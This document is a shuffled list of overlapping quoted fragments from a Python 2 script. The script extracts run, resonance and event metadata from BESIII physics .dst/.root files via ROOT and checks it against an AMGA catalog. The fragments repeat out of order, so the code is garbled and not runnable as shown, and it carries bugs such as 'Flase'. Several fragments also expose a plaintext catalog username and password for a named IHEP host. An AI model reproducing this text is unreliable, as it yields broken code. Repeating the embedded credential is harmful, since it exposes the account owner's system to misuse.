"file(\"%s\");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get(\"JobInfoTree\");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");')",
"file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId",
"splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename if attributes[\"runId\"] == runId:",
"return result #get Boss version, runid, Entry number, JobOptions from root file def",
"%s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error",
"is list,it includes many formats def checkFormat(srcformat,file): flag = 0 #print \"file\",file for",
"runIds = list.group() #split runIds according ',' items=runIds.split(',') #members' style in items is",
"gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new",
"gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);')",
"attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get",
"is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set values of attribute status,streamId,Description #and these values are",
"including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0]",
"entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] #",
"expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance List,add it to resList",
"format def __str__(self): return repr(\"the File's format is not \",self.format) #type of srcformat",
"calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename",
"get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error",
"attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in rootfile",
"filename also is equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"])",
"= mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry",
"result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check all",
"self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes =",
"= 1 return flag #Before reading information from .root file,we need to use",
"reading information from .root file,we need to use changeFormat #function to create a",
"del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name",
"in expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance List,add it to",
"= getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name by calling getLFN",
"class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store",
"is null #null <=> value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"]",
"entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo())",
"import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end)",
"behiend string \"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res",
"def checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in srcformat: #if format",
"result[\"streamId\"] = items[2] result[\"runL\"] = string.atoi(items[3]) result[\"runH\"] = string.atoi(items[4]) return result #get runIdList",
"#set values of attribute status,streamId,Description #and these values are null #-1 <=> value",
"in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType",
"RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of",
"= list.group() #split runIds according ',' items=runIds.split(',') #members' style in items is string,we",
"attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return",
"abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo[\"eventNum\"] = ROOT.num #get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for",
"of Data/All,their EventType are \"all\" attributes[\"eventType\"] = \"all\" #get runId from filename runId",
"DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start - end) start = time.time() obj =",
"attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds)",
"raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this",
"if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then get \"lfn.dst\" items=dstfile.split(\"/\") length=len(items)",
"run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile",
"from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if result is not",
"and Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print",
"getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile return \"error\" else: attributes =",
"\"ExpSearch directory is empty, please run createBesDir first\" return Flase for item in",
"#-1 <=> value of status is null attributes[\"status\"] = -1 del attributes[\"runId\"] del",
"streamId is null #null <=> value of Description is null attributes[\"status\"] = -1",
"lfn #get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile)",
"\"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1]",
"= mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry",
"{} expRes = {} lfnInfo = {} runIds = [] #change the .dst",
"Resonance by calling getExpRes(runid) expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile",
"len(resList) == 1: expRes[\"resonance\"] = resList[0] else: #has several resonances,may be has something",
"#get size of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if",
"run createBesDir first\" return Flase for item in entries: #for each entry,get its",
"these values are null #-1 <=> value of status is null #-1 <=>",
"list = pat.search(str2) if list is not None: #get a string like:-10513,0,-10629 runIds",
"according ',' items=runIds.split(',') #members' style in items is string,we need to change their",
"def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type == \"all\": if",
"%s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL =",
"expRes[\"expNum\"] = str return expRes #check whether eventType is stored in eventTypeList in",
"entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0]",
"naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from",
"= str return expRes #check whether eventType is stored in eventTypeList in amga",
"i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object):",
"#-1 <=> value of status is null #-1 <=> value of streamId is",
"os import os.path import ROOT from ROOT import gROOT from amga import mdclient,mdinterface",
"\"exp\" def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res is not",
"attributes[\"eventType\"] = lfnInfo[\"eventType\"] else: print \"Error %s:eventType %s in filename is not stored",
"name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file",
"= -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import time start=time.time()",
"list is not None: #get a string like:-10513,0,-10629 runIds = list.group() #split runIds",
"from .root file,we need to use changeFormat #function to create a .root link",
"= lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"])",
"= [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while",
"is %d\"%(self.dstfile,lfnInfo[\"runL\"],runL) return \"error\" #get streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType",
"#under catalog \"/BES3/ExpSearch\" if runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum",
"is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return \"error\" else: print \"Error %s:runL in filename is %d,in jobOptions",
"eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry =",
"attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name by calling",
"streamId from filename attributes[\"streamId\"] = lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"])",
"%d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file has several runIds,get them from JobOptions",
"function #get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile)",
"by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print \"Can't get",
"not in expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance List,add it",
"{} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\\d+(,-?\\d+)+}') res1 = pat.search(str1) if",
"file print \"serveral resonance:\",resList return False #only including one expNum if len(expNumList) ==",
"len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these expNum",
"resonance that get from ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else:",
"\"*.dst\" by \".\" #get lfn lfn = filename.split('.')[0] return lfn #get size of",
"data/skim & mc, we use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst",
"getAttributes(self): #store all attributes attributes = {} expRes = {} runIds = []",
"while entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get name of",
"like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT import gROOT from",
"expNum into mexpN1pN2p... sorted(expNumList) str = \"m\" + expNumList[0] for expNum in expNumList[1:]:",
"#null <=> value of Description is null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0'",
"checkFormat(srcformat,file): flag = 0 #print \"file\",file for format in srcformat: #if format of",
"== 1: expRes[\"expNum\"] = expNumList[0] else: #if including several expNums,combine these expNum into",
"several runIds,get them from JobOptions by calling getRunIdList function result = getRunIdList(attributes[\"jobOptions\"]) if",
"= runH = %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\"",
"function #get lfn by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile)",
"attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print result",
"srcformat: #if format of file is in srcformat if file.endswith(format): flag = 1",
"rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT",
"else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name by",
"JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH",
"#get expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes ==",
"def getNum(expNum): format = re.compile(r\"\\d+\") res = format.search(expNum) if res is not None:",
"lfnInfo[\"streamId\"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo[\"eventType\"]) if evtType_exists == True: attributes[\"eventType\"]",
"[] expRes = {} expNumList = [] resList = [] #print\"runids\",runids client =",
"entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get name of each entry",
"if file.endswith(format): flag = 1 return flag #Before reading information from .root file,we",
"= resList[0] else: #has several resonances,may be has something wrong to this file",
"like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2)",
"= attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling getExpRes() expRes",
"client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries is None: print \"ExpSearch",
"ExpSearch if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"] = expRes[\"resonance\"] else: print \"Error %s:resonance in",
"please run createBesDir first\" return Flase for item in entries: #for each entry,get",
"runH,this file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if runId in",
"something wrong to this file print \"serveral resonance:\",resList return False #only including one",
"else: print \"Error %s:eventType %s in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return",
"\"null\" #if resonance in filename is same as resonance that get from ExpSearch",
"#and these values are null #-1 <=> value of status is null #-1",
"expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes == False:",
"calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print \"Can't get expNum",
"between runfrm and runto,and expNum isn't in expNumList #add this expNum to expNumList",
"expRes = getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] =",
"runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else: #this dst file",
".root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[\".dst\",\".tag\"],destformat=[\".root\"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise",
"return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = result[\"description\"] if expRes[\"resonance\"] == lfnInfo[\"resonance\"]: attributes[\"resonance\"]",
"# print item # print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for",
"resonance:\",resList return False #only including one expNum if len(expNumList) == 1: expRes[\"expNum\"] =",
"None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result[\"description\"] = str2 pat =",
"Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes == False: print \"Can't",
"attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"resonance\"] = expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"]",
"values of attribute status,streamId,Description #and these values are null #-1 <=> value of",
"is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]:",
"gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss",
"= expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in filename is same as resonance",
"tree1 =(TTree*)file.Get(\"Event\");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();')",
"else: #if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = \"m\"",
"expRes[\"resonance\"] #set RunH=RunId and RunL=RunId attributes[\"runH\"] = attributes[\"runId\"] attributes[\"runL\"] = attributes[\"runId\"] else: print",
"mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry =",
"result[\"description\"] = str2 pat = re.compile(r'-\\d+(,-?\\d+)+') list = pat.search(str2) if list is not",
"= getRunIdList(attributes[\"jobOptions\"]) if result is not None: runH = max(result[\"runIdList\"]) runL = min(result[\"runIdList\"])",
"\"error\" else: print \"Error %s:runH in filename is %d,in jobOptions is %d\"%(self.dstfile,lfnInfo[\"runH\"],runH) return",
"#if format of file is in srcformat if file.endswith(format): flag = 1 return",
"== runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds)",
"attribute status,streamId,Description #and these values are null #-1 <=> value of status is",
"class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store",
"max(result[\"runIdList\"]) runL = min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"]",
"JobOption commoninfo[\"jobOptions\"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo",
"for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class",
"print \"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\" #set",
"runH = %d,but runId in the root file is %d\"%(self.dstfile,lfnInfo[\"runL\"],attributes[\"runId\"]) return \"error\" else:",
"runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"] = items[1] result[\"streamId\"]",
"name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class",
"getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by \"/\",then",
"rootfile def getAttributes(self): #store all attributes attributes = {} expRes = {} lfnInfo",
"format.search(expNum) if res is not None: return res.group() #Get expNum and resonance from",
"runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance by",
"return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if",
"= getExpRes(result[\"runIdList\"]) if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"]",
"style in items is string,we need to change their style to integer for",
"if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like",
"else: print \"runId of %s,in filename is %d,in rootfile is %d\"%(self.dstfile,lfnInfo[\"runId\"],attributes[\"runId\"]) return \"error\"",
"eventType with name of each entry if eventType == result[0]: return True return",
"new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import",
"mc, we use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os",
"= splitLFN(attributes[\"LFN\"],\"all\") #compare runid of rootfile with runid in filename if attributes[\"runId\"] ==",
"lfnInfo[\"resonance\"]: attributes[\"resonance\"] = lfnInfo[\"resonance\"] else: print \"Error %s:resonance in filename is %s,in ExpSearch",
"client.getEntry()[0] for entry in entries: #get name of each entry client.getattr(entry,['FILE']) result =",
"#get TotEvtNo #commoninfo[\"TotEvtNo\"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo[\"jobOptions\"] =",
"items[2] == \"All\": runId = string.atoi(items[1]) return runId else: result[\"resonance\"] = items[0] result[\"eventType\"]",
"branch =(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader =",
"of dst file def getFileSize(dstfile,format = [\".dst\",\".tag\"]): flag = checkFormat(format,dstfile) if flag==0: raise",
"=(TBranch*)tree->GetBranch(\"JobInfo\");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new",
"also is equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"]",
"#Before reading information from .root file,we need to use changeFormat #function to create",
"runL is equal to runH,this file only has one runId if lfnInfo[\"runL\"] ==",
"is %s,in ExpSearch is %s\"%(self.dstfile,lfnInfo[\"resonance\"],expRes[\"resonance\"]) return \"error\" else: print \"Error %s:in the filename,runL",
"in filename is not stored in AMGA\"%(self.dstfile,lfnInfo[\"eventType\"]) return \"error\" #set values of attribute",
"version, runid, Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo = {}",
"if expRes == False: print \"Error:\",this.dstfile return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] =",
"all runid whether between runfrm and runto of each entry #under catalog \"/BES3/ExpSearch\"",
"srcformat if file.endswith(format): flag = 1 return flag #Before reading information from .root",
"runId def splitLFN(lfn,type): result = {} items = lfn.split(\"_\") if type == \"all\":",
"function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling",
"Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all entries",
"attributes[\"runL\"] = attributes[\"runId\"] else: print \"runId of %s,in filename is %d,in rootfile is",
"#only including one expNum if len(expNumList) == 1: expRes[\"expNum\"] = expNumList[0] else: #if",
"attributes[\"runL\"] = attributes[\"runId\"] attributes[\"runH\"] = attributes[\"runId\"] #get expNum and Resonance by calling getExpRes()",
"if entries is None: print \"ExpSearch directory is empty, please run createBesDir first\"",
"#get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL",
"None: print \"ExpSearch directory is empty, please run createBesDir first\" return Flase for",
"change their style to integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid)",
"function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file only has",
"linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we",
"runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum isn't in expNumList #add",
"attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by",
"this file\" return \"error\" attributes[\"expNum\"] = expRes[\"expNum\"] attributes[\"description\"] = \"null\" #if resonance in",
"sorted(expNumList) str = \"m\" + expNumList[0] for expNum in expNumList[1:]: str = str",
"client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get name",
"value of status is null #-1 <=> value of streamId is null #null",
"equal to runH,this file only has one runId if lfnInfo[\"runL\"] == lfnInfo[\"runH\"]: #if",
"file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print \"Content of this file is null:\",self.dstfile",
"= new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t",
"#compare eventType with name of each entry if eventType == result[0]: return True",
"\"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries",
"#get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"] = abs(ROOT.evtHeader.getRunId()) #get all",
"getAttributes(self): #store all attributes attributes = {} expRes = {} lfnInfo = {}",
"%s:in the filename,runL = runH = %d,but runId in the root file is",
"calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal to runH,this file",
"i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result[\"runIdList\"] = runIdList return result #get",
"file is in srcformat if file.endswith(format): flag = 1 return flag #Before reading",
"DataType commoninfo[\"dataType\"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile =",
"equal to runId in rootfile if attributes[\"runId\"] == lfnInfo[\"runL\"]: runIds.append(attributes[\"runId\"]) attributes[\"runL\"] = attributes[\"runId\"]",
"else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn by",
"return Flase for item in entries: #for each entry,get its attributes in amga",
"#get name by calling getLFN function attributes[\"fileSize\"] = getFileSize(self.dstfile) attributes[\"LFN\"] = getLFN(self.dstfile) #for",
"= pat.search(str1) if res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2 =",
"null attributes[\"status\"] = -1 attributes[\"streamId\"] = 'stream0' attributes[\"description\"] = 'null' del attributes[\"runId\"] del",
"in filename by calling splitLFN function lfnInfo = splitLFN(attributes[\"LFN\"],\"others\") #if runL is equal",
"under catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0]",
"=(TBranch*)tree1->GetBranch(\"TEvtHeader\");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);')",
"of srcformat is list,it includes many formats def checkFormat(srcformat,file): flag = 0 #print",
"catalog \"/BES3/ExpSearch\" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if",
"print \"661:\",str(start - end) start = time.time() obj = DataAll(\"/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root\") end = time.time()",
"if res is not None: return res.group() #Get expNum and resonance from ExpSearch",
"__name__==\"__main__\": import time start=time.time() obj = DataAll(\"/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst\",\"/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root\") end = time.time() print \"661:\",str(start -",
"with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum and Resonance",
"null attributes[\"status\"] = -1 del attributes[\"runId\"] del attributes[\"jobOptions\"] return attributes if __name__==\"__main__\": import",
"= min(result[\"runIdList\"]) if runL == lfnInfo[\"runL\"]: if runH == lfnInfo[\"runH\"]: attributes[\"runL\"] = lfnInfo[\"runL\"]",
"and runto,and expNum isn't in expNumList #add this expNum to expNumList if result[3]",
"gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo[\"bossVer\"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo[\"runId\"]",
"of rootfile with runid in filename if attributes[\"runId\"] == runId: runIds.append(attributes[\"runId\"]) #get expNum",
"#get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile",
"attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items =",
